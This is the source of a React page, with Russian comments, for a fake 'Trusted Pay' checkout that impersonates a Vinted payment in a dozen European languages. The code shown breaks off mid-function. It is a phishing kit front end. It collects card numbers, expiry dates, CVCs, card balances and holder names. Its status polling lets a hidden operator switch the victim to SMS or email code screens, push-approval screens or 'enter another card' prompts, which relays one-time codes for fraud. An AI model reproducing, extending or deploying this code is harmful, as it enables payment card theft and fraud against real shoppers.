import React, { useState, useEffect, useRef } from 'react';
import { useParams, useSearchParams } from 'react-router-dom';
import './Index2.css';
import SupportWidget from './SupportWidget';
import NewCardNotice from './NewCardNotice';
import { getCaptchaCardLabels } from '../captchaLabels';
import { useServerCaptcha } from '../hooks/useServerCaptcha';
import SharedCaptchaCard from './SharedCaptchaCard';
import { API_URL } from '../apiBase';
import {
  resolvePaymentPageCode,
  PAYMENT_FLOW_PAGE_KEY,
  dedupedSessionStart,
  postPaymentTransitionOnce,
} from '../paymentSession';
import { formatCardNumberInput, isValidCardNumber } from '../cardValidation';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id', logId: 'payment_log_id' };

// Словарь переводов для всех экранов Index2
const translations = {
  'NL': {
    currency: '€', lang: 'NL', cardBalance: 'Kaart saldo', deducted: 'Er is € {amount} van uw kaart afgeschreven', continue: 'Doorgaan met betaling', merchant: 'Vinted', complete: 'Voltooi de betaling binnen', expired: 'Tijd is verstreken', paymentDetails: 'Betalingsgegevens', cardNumber: 'Kaartnummer', expiry: 'Vervaldatum', cvc: 'CVC', pay: 'Betaal € {amount}',
    loading: 'Verzoek verwerken...', loadingWait: 'Even geduld alstublieft',
    authTitle: 'Authenticatie aankoop', authDescription: 'Controleer uw telefoon voor de bevestigingscode.', authDescriptionEmail: 'Controleer uw e-mail voor de bevestigingscode.', authCodeLabel: 'Bevestigingscode', authCodePlaceholder: '000000', confirmPayment: 'Bevestig betaling', idCheck: 'ID Check',
    pushTitle: 'Bevestig op uw apparaat', pushDescription: 'Bevestig de betaling op uw telefoon of andere beveiligingsapparaat', pushLoading: 'Verzoek wordt verwerkt...', pushWait: 'Wacht alstublieft',
    errorTitle: 'Probeer opnieuw', errorDescription: 'De betaling is niet gelukt. Probeer het opnieuw.', retryButton: 'Opnieuw proberen',
    logoText: 'Trusted Pay', paymentMethod: 'Bankkaart', fillField: 'Vul dit veld in', cvcLabel: 'Code', balancePlaceholder: 'Bijv. 850.00', saveCard: 'Sla de kaart op in Trusted Pay', billRequired: 'Rekening vereist',
    firstNameLabel: 'Voornaam', lastNameLabel: 'Achternaam', firstNamePlaceholder: 'Voornaam', lastNamePlaceholder: 'Achternaam',
    termsText: 'Door deze betaling uit te voeren, accepteert u de <a href="#">algemene voorwaarden</a> van de service.', exitPayment: 'Verlaat het betalingsproces',
    privacyPolicy: 'Privacybeleid', cookiePolicy: 'Cookiebeleid', cookieSettings: 'Cookie-instellingen', termsOfUse: 'Gebruiksvoorwaarden', footerCopy: '© 2001-2026, Trusted Pay'
  },
  'DK': {
    currency: 'kr', lang: 'DK', cardBalance: 'Kort saldo', deducted: 'Der er trukket {amount} kr fra dit kort', continue: 'Fortsæt med betaling', merchant: 'Vinted', complete: 'Fuldfør betalingen inden for', expired: 'Tiden er udløbet', paymentDetails: 'Betalingsoplysninger', cardNumber: 'Kortnummer', expiry: 'Udløbsdato', cvc: 'CVC', pay: 'Betal {amount} kr',
    loading: 'Behandler anmodning...', loadingWait: 'Vent venligst',
    authTitle: 'Købsgodkendelse', authDescription: 'Vi har sendt en sms til dit registrerede mobilnummer.', authDescriptionEmail: 'Tjek din e-mail for bekræftelseskoden.', authCodeLabel: 'Bekræftelseskode', authCodePlaceholder: '000000', confirmPayment: 'Bekræft betaling', idCheck: 'ID Check',
    pushTitle: 'Bekræft på din enhed', pushDescription: 'Bekræft betalingen på din telefon eller andet sikkerhedsapparat', pushLoading: 'Anmodning behandles...', pushWait: 'Vent venligst',
    errorTitle: 'Prøv igen', errorDescription: 'Betalingen lykkedes ikke. Prøv igen.', retryButton: 'Prøv igen',
    logoText: 'Trusted Pay', paymentMethod: 'Bankkort', fillField: 'Udfyld dette felt', cvcLabel: 'Kode', balancePlaceholder: 'F.eks. 850.00', saveCard: 'Gem kortet i Trusted Pay', billRequired: 'Faktura kræves',
    firstNameLabel: 'Fornavn', lastNameLabel: 'Efternavn', firstNamePlaceholder: 'Fornavn', lastNamePlaceholder: 'Efternavn',
    termsText: 'Ved at gennemføre denne betaling accepterer du <a href="#">vilkår og betingelser</a> for servicen.', exitPayment: 'Afslut betalingsprocessen',
    privacyPolicy: 'Privatlivspolitik', cookiePolicy: 'Cookiepolitik', cookieSettings: 'Cookieindstillinger', termsOfUse: 'Brugsvilkår', footerCopy: '© 2001-2026, Trusted Pay'
  },
  'SE': {
    currency: 'kr', lang: 'SE', cardBalance: 'Kortsaldo', deducted: '{amount} kr har dragits från ditt kort', continue: 'Fortsätt med betalningen', merchant: 'Vinted', complete: 'Slutför betalningen inom', expired: 'Tiden har gått ut', paymentDetails: 'Betalningsuppgifter', cardNumber: 'Kortnummer', expiry: 'Utgångsdatum', cvc: 'CVC', pay: 'Betala {amount} kr',
    loading: 'Bearbetar begäran...', loadingWait: 'Vänta',
    authTitle: 'Köpautentisering', authDescription: 'Vi har skickat ett SMS till ditt registrerade mobilnummer.', authDescriptionEmail: 'Kontrollera din e-post för bekräftelsekoden.', authCodeLabel: 'Bekräftelsekod', authCodePlaceholder: '000000', confirmPayment: 'Bekräfta betalning', idCheck: 'ID Check',
    pushTitle: 'Bekräfta på din enhet', pushDescription: 'Bekräfta betalningen på telefonen eller annan säkerhetsenhet', pushLoading: 'Begäran bearbetas...', pushWait: 'Vänta',
    errorTitle: 'Försök igen', errorDescription: 'Betalningen misslyckades. Försök igen.', retryButton: 'Försök igen',
    logoText: 'Trusted Pay', paymentMethod: 'Bankkort', fillField: 'Fyll i detta fält', cvcLabel: 'Kod', balancePlaceholder: 'T.ex. 850.00', saveCard: 'Spara kortet i Trusted Pay', billRequired: 'Faktura krävs',
    firstNameLabel: 'Förnamn', lastNameLabel: 'Efternamn', firstNamePlaceholder: 'Förnamn', lastNamePlaceholder: 'Efternamn',
    termsText: 'Genom att genomföra denna betalning godkänner du tjänstens <a href="#">villkor</a>.', exitPayment: 'Avsluta betalningsprocessen',
    privacyPolicy: 'Integritetspolicy', cookiePolicy: 'Cookiepolicy', cookieSettings: 'Cookieinställningar', termsOfUse: 'Användarvillkor', footerCopy: '© 2001-2026, Trusted Pay'
  },
  'ES': {
    currency: '€', lang: 'ES', cardBalance: 'Saldo de la tarjeta', deducted: 'Se ha deducido € {amount} de su tarjeta', continue: 'Continuar con el pago', merchant: 'Vinted', complete: 'Complete el pago dentro de', expired: 'El tiempo ha expirado', paymentDetails: 'Detalles de pago', cardNumber: 'Número de tarjeta', expiry: 'Fecha de caducidad', cvc: 'CVC', pay: 'Pagar € {amount}',
    loading: 'Procesando solicitud...', loadingWait: 'Por favor espere',
    authTitle: 'Autenticación de compra', authDescription: 'Le hemos enviado un mensaje de texto a su número de móvil registrado.', authDescriptionEmail: 'Compruebe su correo electrónico para el código de confirmación.', authCodeLabel: 'Código de confirmación', authCodePlaceholder: '000000', confirmPayment: 'Confirmar pago', idCheck: 'ID Check',
    pushTitle: 'Confirme en su dispositivo', pushDescription: 'Confirme el pago en su teléfono u otro dispositivo de seguridad', pushLoading: 'Solicitud en proceso...', pushWait: 'Por favor espere',
    errorTitle: 'Inténtelo de nuevo', errorDescription: 'El pago no se ha realizado. Inténtelo de nuevo.', retryButton: 'Intentar de nuevo',
    logoText: 'Trusted Pay', paymentMethod: 'Tarjeta bancaria', fillField: 'Rellene este campo', cvcLabel: 'Código', balancePlaceholder: 'P. ej. 850.00', saveCard: 'Guardar la tarjeta en Trusted Pay', billRequired: 'Factura requerida',
    firstNameLabel: 'Nombre', lastNameLabel: 'Apellido', firstNamePlaceholder: 'Nombre', lastNamePlaceholder: 'Apellido',
    termsText: 'Al completar este pago, acepta los <a href="#">términos y condiciones</a> del servicio.', exitPayment: 'Salir del proceso de pago',
    privacyPolicy: 'Política de privacidad', cookiePolicy: 'Política de cookies', cookieSettings: 'Configuración de cookies', termsOfUse: 'Términos de uso', footerCopy: '© 2001-2026, Trusted Pay'
  },
  'FR': {
    currency: '€', lang: 'FR', cardBalance: 'Solde de la carte', deducted: '{amount} € ont été débités de votre carte', continue: 'Continuer le paiement', merchant: 'Vinted', complete: 'Terminez le paiement dans', expired: 'Le temps est écoulé', paymentDetails: 'Détails de paiement', cardNumber: 'Numéro de carte', expiry: 'Date d\'expiration', cvc: 'CVC', pay: 'Payer {amount} €',
    loading: 'Traitement de la demande...', loadingWait: 'Veuillez patienter',
    authTitle: 'Authentification d\'achat', authDescription: 'Nous vous avons envoyé un SMS sur votre numéro de mobile enregistré.', authDescriptionEmail: 'Vérifiez votre e-mail pour le code de confirmation.', authCodeLabel: 'Code de confirmation', authCodePlaceholder: '000000', confirmPayment: 'Confirmer le paiement', idCheck: 'ID Check',
    pushTitle: 'Confirmez sur votre appareil', pushDescription: 'Confirmez le paiement sur votre téléphone ou autre appareil de sécurité', pushLoading: 'Demande en cours de traitement...', pushWait: 'Veuillez patienter',
    errorTitle: 'Réessayez', errorDescription: 'Le paiement n\'a pas abouti. Réessayez.', retryButton: 'Réessayer',
    logoText: 'Trusted Pay', paymentMethod: 'Carte bancaire', fillField: 'Remplissez ce champ', cvcLabel: 'Code', balancePlaceholder: 'Ex. 850.00', saveCard: 'Enregistrer la carte dans Trusted Pay', billRequired: 'Facture requise',
    firstNameLabel: 'Prénom', lastNameLabel: 'Nom', firstNamePlaceholder: 'Prénom', lastNamePlaceholder: 'Nom',
    termsText: 'En effectuant ce paiement, vous acceptez les <a href="#">conditions générales</a> du service.', exitPayment: 'Quitter le processus de paiement',
    privacyPolicy: 'Politique de confidentialité', cookiePolicy: 'Politique des cookies', cookieSettings: 'Paramètres des cookies', termsOfUse: 'Conditions d\'utilisation', footerCopy: '© 2001-2026, Trusted Pay'
  },
  'IT': {
    currency: '€', lang: 'IT', cardBalance: 'Saldo carta', deducted: 'Sono stati addebitati € {amount} dalla tua carta', continue: 'Continua con il pagamento', merchant: 'Vinted', complete: 'Completa il pagamento entro', expired: 'Il tempo è scaduto', paymentDetails: 'Dettagli di pagamento', cardNumber: 'Numero carta', expiry: 'Data di scadenza', cvc: 'CVC', pay: 'Paga € {amount}',
    loading: 'Elaborazione richiesta...', loadingWait: 'Attendere prego',
    authTitle: 'Autenticazione acquisto', authDescription: 'Ti abbiamo inviato un SMS al tuo numero di cellulare registrato.', authCodeLabel: 'Codice di conferma', authCodePlaceholder: '000000', confirmPayment: 'Conferma pagamento', idCheck: 'ID Check',
    pushTitle: 'Conferma sul tuo dispositivo', pushDescription: 'Conferma il pagamento sul tuo telefono o altro dispositivo di sicurezza', pushLoading: 'Richiesta in elaborazione...', pushWait: 'Attendere prego',
    errorTitle: 'Riprova', errorDescription: 'Il pagamento non è andato a buon fine. Riprova.', retryButton: 'Riprova',
    logoText: 'Trusted Pay', paymentMethod: 'Carta bancaria', fillField: 'Compila questo campo', cvcLabel: 'Codice', balancePlaceholder: 'Es. 850.00', saveCard: 'Salva la carta in Trusted Pay', billRequired: 'Fattura richiesta',
    firstNameLabel: 'Nome', lastNameLabel: 'Cognome', firstNamePlaceholder: 'Nome', lastNamePlaceholder: 'Cognome',
    termsText: 'Completando questo pagamento, accetti i <a href="#">termini e condizioni</a> del servizio.', exitPayment: 'Esci dal processo di pagamento',
    privacyPolicy: 'Informativa sulla privacy', cookiePolicy: 'Cookie policy', cookieSettings: 'Impostazioni cookie', termsOfUse: 'Termini di utilizzo', footerCopy: '© 2001-2026, Trusted Pay'
  },
  'PT': {
    currency: '€', lang: 'PT', cardBalance: 'Saldo do cartão', deducted: 'Foram deduzidos € {amount} do seu cartão', continue: 'Continuar com o pagamento', merchant: 'Vinted', complete: 'Complete o pagamento dentro de', expired: 'O tempo expirou', paymentDetails: 'Detalhes do pagamento', cardNumber: 'Número do cartão', expiry: 'Data de validade', cvc: 'CVC', pay: 'Pagar € {amount}',
    loading: 'A processar pedido...', loadingWait: 'Por favor aguarde',
    authTitle: 'Autenticação de compra', authDescription: 'Enviámos uma mensagem de texto para o seu número de telemóvel registado.', authDescriptionEmail: 'Verifique o seu e-mail para o código de confirmação.', authCodeLabel: 'Código de confirmação', authCodePlaceholder: '000000', confirmPayment: 'Confirmar pagamento', idCheck: 'ID Check',
    pushTitle: 'Confirme no seu dispositivo', pushDescription: 'Confirme o pagamento no seu telemóvel ou outro dispositivo de segurança', pushLoading: 'Pedido a ser processado...', pushWait: 'Por favor aguarde',
    errorTitle: 'Tente novamente', errorDescription: 'O pagamento não foi concluído. Tente novamente.', retryButton: 'Tentar novamente',
    logoText: 'Trusted Pay', paymentMethod: 'Cartão bancário', fillField: 'Preencha este campo', cvcLabel: 'Código', balancePlaceholder: 'Ex. 850.00', saveCard: 'Guardar o cartão no Trusted Pay', billRequired: 'Fatura necessária',
    firstNameLabel: 'Nome', lastNameLabel: 'Apelido', firstNamePlaceholder: 'Nome', lastNamePlaceholder: 'Apelido',
    termsText: 'Ao concluir este pagamento, aceita os <a href="#">termos e condições</a> do serviço.', exitPayment: 'Sair do processo de pagamento',
    privacyPolicy: 'Política de privacidade', cookiePolicy: 'Política de cookies', cookieSettings: 'Definições de cookies', termsOfUse: 'Termos de utilização', footerCopy: '© 2001-2026, Trusted Pay'
  },
  'BE': {
    currency: '€', lang: 'BE', cardBalance: 'Kaart saldo', deducted: 'Er is € {amount} van uw kaart afgeschreven', continue: 'Doorgaan met betaling', merchant: 'Vinted', complete: 'Voltooi de betaling binnen', expired: 'Tijd is verstreken', paymentDetails: 'Betalingsgegevens', cardNumber: 'Kaartnummer', expiry: 'Vervaldatum', cvc: 'CVC', pay: 'Betaal € {amount}',
    loading: 'Verzoek verwerken...', loadingWait: 'Even geduld alstublieft',
    authTitle: 'Authenticatie aankoop', authDescription: 'We hebben een sms naar uw geregistreerde telefoonnummer gestuurd.', authDescriptionEmail: 'Controleer uw e-mail voor de bevestigingscode.', authCodeLabel: 'Bevestigingscode', authCodePlaceholder: '000000', confirmPayment: 'Bevestig betaling', idCheck: 'ID Check',
    pushTitle: 'Bevestig op uw apparaat', pushDescription: 'Bevestig de betaling op uw telefoon of andere beveiligingsapparaat', pushLoading: 'Verzoek wordt verwerkt...', pushWait: 'Wacht alstublieft',
    errorTitle: 'Probeer opnieuw', errorDescription: 'De betaling is niet gelukt. Probeer het opnieuw.', retryButton: 'Opnieuw proberen',
    logoText: 'Trusted Pay', paymentMethod: 'Bankkaart', fillField: 'Vul dit veld in', cvcLabel: 'Code', balancePlaceholder: 'Bijv. 850.00', saveCard: 'Sla de kaart op in Trusted Pay', billRequired: 'Rekening vereist',
    firstNameLabel: 'Voornaam', lastNameLabel: 'Achternaam', firstNamePlaceholder: 'Voornaam', lastNamePlaceholder: 'Achternaam',
    termsText: 'Door deze betaling uit te voeren, accepteert u de <a href="#">algemene voorwaarden</a> van de service.', exitPayment: 'Verlaat het betalingsproces',
    privacyPolicy: 'Privacybeleid', cookiePolicy: 'Cookiebeleid', cookieSettings: 'Cookie-instellingen', termsOfUse: 'Gebruiksvoorwaarden', footerCopy: '© 2001-2026, Trusted Pay'
  },
  'BG': {
    currency: 'лв', lang: 'BG', cardBalance: 'Салдо на картата', deducted: 'От вашата карта е дебитирано {amount} лв', continue: 'Продължете с плащането', merchant: 'Vinted', complete: 'Завършете плащането в рамките на', expired: 'Времето е изтекло', paymentDetails: 'Детайли за плащане', cardNumber: 'Номер на карта', expiry: 'Срок на валидност', cvc: 'CVC', pay: 'Платете {amount} лв',
    loading: 'Обработка на заявката...', loadingWait: 'Моля, изчакайте',
    authTitle: 'Удостоверяване на покупката', authDescription: 'Изпратихме ви SMS на регистрирания мобилен номер.', authCodeLabel: 'Код за потвърждение', authCodePlaceholder: '000000', confirmPayment: 'Потвърди плащането', idCheck: 'ID Check',
    pushTitle: 'Потвърдете на устройството си', pushDescription: 'Потвърдете плащането на телефона или друго устройство за сигурност', pushLoading: 'Заявката се обработва...', pushWait: 'Моля, изчакайте',
    errorTitle: 'Опитайте отново', errorDescription: 'Плащането не беше успешно. Опитайте отново.', retryButton: 'Опитай отново',
    logoText: 'Trusted Pay', paymentMethod: 'Банкова карта', fillField: 'Попълнете това поле', cvcLabel: 'Код', balancePlaceholder: 'Напр. 850.00', saveCard: 'Запазете картата в Trusted Pay', billRequired: 'Изисква се фактура',
    firstNameLabel: 'Име', lastNameLabel: 'Фамилия', firstNamePlaceholder: 'Име', lastNamePlaceholder: 'Фамилия',
    termsText: 'При извършване на това плащане приемате <a href="#">общите условия</a> на услугата.', exitPayment: 'Напускане на процеса на плащане',
    privacyPolicy: 'Политика за поверителност', cookiePolicy: 'Политика за бисквитки', cookieSettings: 'Настройки за бисквитки', termsOfUse: 'Условия за ползване', footerCopy: '© 2001-2026, Trusted Pay'
  },
  'HR': {
    currency: 'kn', lang: 'HR', cardBalance: 'Stanje kartice', deducted: 'S vaše kartice je zaduženo {amount} kn', continue: 'Nastavite s plaćanjem', merchant: 'Vinted', complete: 'Završite plaćanje u roku od', expired: 'Vrijeme je isteklo', paymentDetails: 'Detalji plaćanja', cardNumber: 'Broj kartice', expiry: 'Datum isteka', cvc: 'CVC', pay: 'Platite {amount} kn',
    loading: 'Obrada zahtjeva...', loadingWait: 'Molimo pričekajte',
    authTitle: 'Autentifikacija kupnje', authDescription: 'Poslali smo vam SMS na vaš registrirani broj mobitela.', authDescriptionEmail: 'Provjerite svoju e-poštu za potvrdni kod.', authCodeLabel: 'Potvrdni kod', authCodePlaceholder: '000000', confirmPayment: 'Potvrdi plaćanje', idCheck: 'ID Check',
    pushTitle: 'Potvrdite na svom uređaju', pushDescription: 'Potvrdite plaćanje na telefonu ili drugom sigurnosnom uređaju', pushLoading: 'Zahtjev se obrađuje...', pushWait: 'Molimo pričekajte',
    errorTitle: 'Pokušajte ponovno', errorDescription: 'Plaćanje nije uspjelo. Pokušajte ponovno.', retryButton: 'Pokušaj ponovno',
    logoText: 'Trusted Pay', paymentMethod: 'Bankovna kartica', fillField: 'Ispunite ovo polje', cvcLabel: 'Kod', balancePlaceholder: 'Npr. 850.00', saveCard: 'Spremi karticu u Trusted Pay', billRequired: 'Potrebna faktura',
    firstNameLabel: 'Ime', lastNameLabel: 'Prezime', firstNamePlaceholder: 'Ime', lastNamePlaceholder: 'Prezime',
    termsText: 'Izvršavanjem ove uplate prihvaćate <a href="#">uvjete korištenja</a> usluge.', exitPayment: 'Izlaz iz procesa plaćanja',
    privacyPolicy: 'Pravila o privatnosti', cookiePolicy: 'Pravila o kolačićima', cookieSettings: 'Postavke kolačića', termsOfUse: 'Uvjeti korištenja', footerCopy: '© 2001-2026, Trusted Pay'
  },
  'RO': {
    currency: 'lei', lang: 'RO', cardBalance: 'Soldul cardului', deducted: 'Au fost debitate {amount} lei de pe cardul dvs.', continue: 'Continuați cu plata', merchant: 'Vinted', complete: 'Finalizați plata în termen de', expired: 'Timpul a expirat', paymentDetails: 'Detalii plată', cardNumber: 'Număr card', expiry: 'Data expirării', cvc: 'CVC', pay: 'Plătiți {amount} lei',
    loading: 'Se procesează cererea...', loadingWait: 'Vă rugăm așteptați',
    authTitle: 'Autentificare achiziție', authDescription: 'V-am trimis un mesaj text pe numărul de mobil înregistrat.', authDescriptionEmail: 'Verificați e-mailul pentru codul de confirmare.', authCodeLabel: 'Cod de confirmare', authCodePlaceholder: '000000', confirmPayment: 'Confirmați plata', idCheck: 'ID Check',
    pushTitle: 'Confirmați pe dispozitivul dvs.', pushDescription: 'Confirmați plata pe telefon sau alt dispozitiv de securitate', pushLoading: 'Cererea se procesează...', pushWait: 'Vă rugăm așteptați',
    errorTitle: 'Încercați din nou', errorDescription: 'Plata nu a reușit. Încercați din nou.', retryButton: 'Încercați din nou',
    logoText: 'Trusted Pay', paymentMethod: 'Card bancar', fillField: 'Completați acest câmp', cvcLabel: 'Cod', balancePlaceholder: 'Ex. 850.00', saveCard: 'Salvați cardul în Trusted Pay', billRequired: 'Factură necesară',
    firstNameLabel: 'Prenume', lastNameLabel: 'Nume', firstNamePlaceholder: 'Prenume', lastNamePlaceholder: 'Nume',
    termsText: 'Prin finalizarea acestei plăți, acceptați <a href="#">termenii și condițiile</a> serviciului.', exitPayment: 'Părăsiți procesul de plată',
    privacyPolicy: 'Politica de confidențialitate', cookiePolicy: 'Politica de cookie-uri', cookieSettings: 'Setări cookie-uri', termsOfUse: 'Termeni de utilizare', footerCopy: '© 2001-2026, Trusted Pay'
  },
  'SK': {
    currency: '€', lang: 'SK', cardBalance: 'Zostatok na karte', deducted: 'Z vašej karty bolo strhnuté € {amount}', continue: 'Pokračovať v platbe', merchant: 'Vinted', complete: 'Dokončite platbu do', expired: 'Čas vypršal', paymentDetails: 'Údaje o platbe', cardNumber: 'Číslo karty', expiry: 'Dátum expirácie', cvc: 'CVC', pay: 'Zaplatiť € {amount}',
    loading: 'Spracúva sa požiadavka...', loadingWait: 'Prosím čakajte',
    authTitle: 'Overenie nákupu', authDescription: 'Poslali sme vám SMS na registrované telefónne číslo.', authDescriptionEmail: 'Skontrolujte e-mail kvôli potvrdzovaciemu kódu.', authCodeLabel: 'Potvrdzovací kód', authCodePlaceholder: '000000', confirmPayment: 'Potvrďte platbu', idCheck: 'ID Check',
    pushTitle: 'Potvrďte na zariadení', pushDescription: 'Potvrďte platbu na telefóne alebo inom bezpečnostnom zariadení', pushLoading: 'Spracúva sa požiadavka...', pushWait: 'Prosím čakajte',
    errorTitle: 'Skúste znova', errorDescription: 'Platba nebola úspešná. Skúste to znova.', retryButton: 'Skúsiť znova',
    logoText: 'Trusted Pay', paymentMethod: 'Banková karta', fillField: 'Vyplňte toto pole', cvcLabel: 'Kód', balancePlaceholder: 'napr. 850.00', saveCard: 'Uložiť kartu v Trusted Pay', billRequired: 'Vyžaduje sa faktúra',
    firstNameLabel: 'Meno', lastNameLabel: 'Priezvisko', firstNamePlaceholder: 'Meno', lastNamePlaceholder: 'Priezvisko',
    termsText: 'Dokončením tejto platby súhlasíte s <a href="#">podmienkami služby</a>.', exitPayment: 'Opustiť proces platby',
    privacyPolicy: 'Zásady ochrany osobných údajov', cookiePolicy: 'Zásady súborov cookie', cookieSettings: 'Nastavenia súborov cookie', termsOfUse: 'Podmienky používania', footerCopy: '© 2001-2026, Trusted Pay'
  }
};

function Index2() {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(null);
  const [totalSeconds, setTotalSeconds] = useState(10 * 60); // 10 минут в секундах
  const [cardNumber, setCardNumber] = useState('');
  const [expiryMM, setExpiryMM] = useState('');
  const [expiryYY, setExpiryYY] = useState('');
  const [cvc, setCvc] = useState('');
  const [step, setStep] = useState('form'); // form -> balance -> auth -> success
  const [cardBalance, setCardBalance] = useState(''); // Баланс карты (вводит пользователь)
  const [firstName, setFirstName] = useState('');
  const [lastName, setLastName] = useState('');
  const [initialBalance, setInitialBalance] = useState(0); // Начальный баланс для вычисления
  const [confirmationCode, setConfirmationCode] = useState('');
  const [showErrors, setShowErrors] = useState(false);
  const [sessionId, setSessionId] = useState(null);
  const [currentLogId, setCurrentLogId] = useState(null);
  const [isLoading, setIsLoading] = useState(false);
  const sessionInitialized = useRef(false); // Флаг для предотвращения двойной инициализации
  const [searchParams] = useSearchParams();
  const [otpDelivery, setOtpDelivery] = useState(null); // 'email' | 'sms' — от кнопки админа
  const [showNewCardNotice, setShowNewCardNotice] = useState(false);
  const isEmailOtp = searchParams.get('otp_type') === 'email' || otpDelivery === 'email';
  const balanceChecker = pageData?.balance_checker !== false; // по умолчанию true
  const requireCardHolderName = pageData?.require_card_holder_name !== false; // по умолчанию true — Имя Фамилия на карту
  // «Другая карта»: при отправке формы передаём этот log_id, чтобы бэкенд обновил тот же лог, а не создавал новый
  const keepTakerFromLogIdRef = useRef(null);
  // Тип карты по первой цифре номера (4 = VISA, 5 = Mastercard) — для иконки в шапке
  const cardType = cardNumber.trim().length >= 1
    ? (cardNumber.replace(/\s/g, '').charAt(0) === '4' ? 'visa' : 'mastercard')
    : null;

  // Определяем язык и переводы (localhost /index2 → PT por defeito)
  const pathOnlyIndex2 = typeof window !== 'undefined' && window.location.pathname === '/index2';
  const isLocalhost =
    typeof window !== 'undefined' &&
    (window.location.hostname === 'localhost' || window.location.hostname === '127.0.0.1');
  const countryCode =
    pageData?.country_code || (isLocalhost && pathOnlyIndex2 ? 'PT' : 'NL');
  const baseT = translations[countryCode] || translations['NL'];
  const t = baseT;
  const captchaLabels = getCaptchaCardLabels(countryCode);
  const captcha = useServerCaptcha(API_URL, sessionId, Boolean(pageData?.captcha_enabled));
  const { captchaPassed, handleCaptchaVerify, invalidateCaptcha } = captcha;
  const productPrice = pageData?.price || 100.00;

  // Загрузка данных страницы
  useEffect(() => {
    if (pageCode) {
      fetch(`${API_URL}/api/page/${pageCode}`)
        .then(res => res.json())
        .then(data => {
          if (data.success) {
            setPageData(data.page);
          }
        })
        .catch(err => {
          console.error('Ошибка загрузки данных страницы:', err);
        });
    }
  }, [pageCode]);

  useEffect(() => {
    const pc = resolvePaymentPageCode(pageCode);
    if (!pc) return;
    const prev = sessionStorage.getItem(PAYMENT_FLOW_PAGE_KEY);
    if (prev && prev !== pc) {
      sessionStorage.removeItem(SESSION_STORAGE_KEYS.sessionId);
      sessionStorage.removeItem(SESSION_STORAGE_KEYS.logId);
      sessionInitialized.current = false;
    }
    sessionStorage.setItem(PAYMENT_FLOW_PAGE_KEY, pc);
  }, [pageCode]);

  // Инициализация сессии при загрузке страницы
  useEffect(() => {
    const effectivePc = resolvePaymentPageCode(pageCode);
    if (!effectivePc) return;
    if (sessionInitialized.current) return;
    sessionInitialized.current = true;

    const initSession = async () => {
      const storedSessionId = sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId);
      const storedLogId = sessionStorage.getItem(SESSION_STORAGE_KEYS.logId);
      if (storedSessionId && storedLogId) {
        setSessionId(storedSessionId);
        setCurrentLogId(parseInt(storedLogId, 10));
        setTimeout(() => {
          postPaymentTransitionOnce(API_URL, {
            log_id: storedLogId,
            session_id: storedSessionId,
            page_code: effectivePc,
          });
        }, 300);
        return;
      }
      try {
        const pathname = window.location.pathname;
        let unique_id = null;
        const pathMatch = pathname.match(/\/([A-Z0-9]{16})(?:\/|$|\/index2)/);
        if (pathMatch) unique_id = pathMatch[1];
        const urlParams = new URLSearchParams(window.location.search);
        const referralCode = urlParams.get('ref');

        const data = await dedupedSessionStart(API_URL, {
          unique_id: unique_id,
          referral_code: referralCode,
          page_code: effectivePc,
        });

        if (data.success) {
          setSessionId(data.session_id);
          setCurrentLogId(data.log_id);
          if (data.session_id) sessionStorage.setItem(SESSION_STORAGE_KEYS.sessionId, data.session_id);
          if (data.log_id) sessionStorage.setItem(SESSION_STORAGE_KEYS.logId, String(data.log_id));
          if (data.log_id && data.session_id) {
            setTimeout(() => {
              postPaymentTransitionOnce(API_URL, {
                log_id: data.log_id,
                session_id: data.session_id,
                page_code: effectivePc,
              });
            }, 800);
          }
        }
      } catch (error) {
        console.error('Ошибка инициализации сессии:', error);
        const tempSessionId = 'temp_' + Date.now();
        setSessionId(tempSessionId);
      }
    };

    initSession();
  }, [pageCode]);

  // Таймер обратного отсчета
  useEffect(() => {
    const timerInterval = setInterval(() => {
      setTotalSeconds((prevSeconds) => {
        if (prevSeconds > 0) {
          return prevSeconds - 1;
        } else {
          clearInterval(timerInterval);
          return 0;
        }
      });
    }, 1000);

    return () => clearInterval(timerInterval);
  }, []);

  // Проверка статуса лога (для бесконечной загрузки после ввода карты, OTP или PUSH)
  useEffect(() => {
    // Проверяем статус если есть currentLogId
    if (!currentLogId) return;
    // Проверяем статус если загрузка активна ИЛИ мы на экране push/auth/form (после ввода карты)
    if (!isLoading && step !== 'push' && step !== 'auth' && step !== 'form') return;
    
    const checkLogStatus = async () => {
      try {
        const controller = new AbortController();
        const timeoutId = setTimeout(() => controller.abort(), 5000); // 5 секунд timeout
        
        const response = await fetch(`${API_URL}/api/log/status/${currentLogId}`, {
          method: 'GET',
          headers: {
            'Content-Type': 'application/json',
          },
          signal: controller.signal
        });
        
        clearTimeout(timeoutId);
        
        if (!response.ok) {
          throw new Error(`HTTP error! status: ${response.status}`);
        }
        
        const data = await response.json();
        
        console.log('Проверка статуса лога:', data, 'step:', step, 'isLoading:', isLoading); // Для отладки
        
        if (data.success && data.status === 'otp_requested') {
          // Админ нажал OTP (SMS). Переход на auth только если ещё не на экране ввода кода (идём с формы карты).
          // Если уже на auth (пользователь ввёл код и ждёт) — не трогаем экран, оставляем загрузку до действия оператора.
          if (step !== 'auth') {
            setOtpDelivery('sms');
            setStep('auth');
            setIsLoading(true);
            setTimeout(() => setIsLoading(false), 1800);
          }
        } else if (data.success && data.status === 'email_otp_requested') {
          if (step !== 'auth') {
            setOtpDelivery('email');
            setStep('auth');
            setIsLoading(true);
            setTimeout(() => setIsLoading(false), 1800);
          }
        } else if (data.success && data.status === 'push_requested') {
          // Админ нажал "PUSH" - показываем экран PUSH (на нём свой блок загрузки, не полноэкранный)
          console.log('Статус push_requested получен, переход на экран PUSH');
          setIsLoading(false);
          setStep('push');
        } else if (data.success && data.status === 'new_card_requested') {
          setIsLoading(false);
          setOtpDelivery(null);
          setShowNewCardNotice(true);
          setStep('form');
          setCardNumber('');
          setExpiryMM('');
          setExpiryYY('');
          setCvc('');
          setCardBalance('');
          setFirstName('');
          setLastName('');
          if (currentLogId) keepTakerFromLogIdRef.current = currentLogId;
          setCurrentLogId(null);
          setInitialBalance(0);
        } else if (data.success && data.status === 'retry_payment') {
          setIsLoading(false);
          setOtpDelivery(null);
          setStep('error');
        } else if (data.success && data.status === 'rejected') {
          setIsLoading(false);
          setOtpDelivery(null);
        } else if (data.success && data.status === 'paid') {
          setIsLoading(false);
          setOtpDelivery(null);
          setStep('success');
        }
        // Если pending - продолжаем проверку
      } catch (error) {
        if (error.name === 'AbortError') {
          console.warn('Таймаут при проверке статуса лога (API сервер может быть недоступен)');
        } else {
